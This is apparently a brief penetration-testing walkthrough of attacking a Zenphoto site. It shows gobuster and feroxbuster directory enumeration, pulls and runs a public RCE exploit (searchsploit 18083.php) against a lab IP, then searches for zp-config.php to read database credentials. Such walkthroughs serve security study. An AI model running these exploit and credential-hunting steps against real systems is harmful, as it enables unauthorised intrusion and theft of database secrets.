Last updated 5 months ago
Was this helpful?
.robot:
.svn:
.DS_STORE
gobuster dir -u ${ip} -w /usr/share/wordlists/dirb/common.txt -t 5
dirbuster
feroxbuster -u http://host.domain.tld:80/ -x php -C 404 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt' -B --auto-tune
Found test: Now accessing it: We have zenphoto.
We can search for exploits: We have a RCE exploit.
Trying it:
searchsploit -m php/webapps/18083.php
php 18083.php
php 18083.php 192.168.212.41 /test/
find / -type f -name "zp-config.php" 2>/dev/null
We have code execution.
Now we can look for files in the directory. Now to find the file:
We can read it: We have some info on the database
